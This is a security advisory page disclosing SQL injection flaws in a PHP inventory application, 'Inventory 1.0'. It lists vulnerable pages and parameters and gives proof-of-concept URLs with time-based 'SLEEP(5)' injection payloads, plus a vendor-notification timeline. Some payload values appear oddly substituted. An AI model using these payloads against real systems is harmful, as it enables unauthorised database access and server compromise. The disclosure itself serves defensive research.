Inventory 1.0 SQL Injection

2012.10.27
Credit: G13
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: Inventory 1.0 Multiple SQL Vulnerabilities # Date: 10/19/12 # Author: G13 # Twitter: @g13net # Software Site: https://github.com/farevalod/inventory # Version: 1.0 # Category: webapp (php) # dc585 ##### ToC ##### 0x01 Description 0x02 SQL Injection 0x03 Vendor Notification ##### 0x01 Description ##### PHP + SQL Inventory tracking system ##### 0x02 SQL Injection ##### The Inventoy application has muliple pages and parameters that are vulnerable to SQL injection. These vulnerabilities could be used to extract information from the database or take remote control of the server. -----Vulnerable Pages----- http://localhost/inventory/consulta_fact.php?fact_num=[SQLi] http://localhost/inventory/addinventario.php?ref=[SQLi]&sn=[SQLi]&factura=[SQLi] http://localhost/inventory/newtransact.php?ref=[SQLi] -----PoC Exploits----- http://localhost/inventory/consulta_fact.php?fact_num=17 AND SLEEP(5) http://localhost/inventory/addinventario.php?ref=555-555-0199@example.com' AND SLEEP(5) AND 'EJxe'='EJxe&sn=555-555- 0199@example.com' AND SLEEP(5) AND 'IgkP'='IgkP&factura=555-555-0199@example.com' AND SLEEP(5) AND 'CFdY'='CFdY http://localhost/inventory/newtransact.php?ref=RSC-280' AND SLEEP(5) AND 'wIUB'='wIUB ##### 0x03 Vendor Notification ##### 10/19/12 - Vendor Notified 10/26/12 - No response, disclosure

References:

https://github.com/farevalod/inventory


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top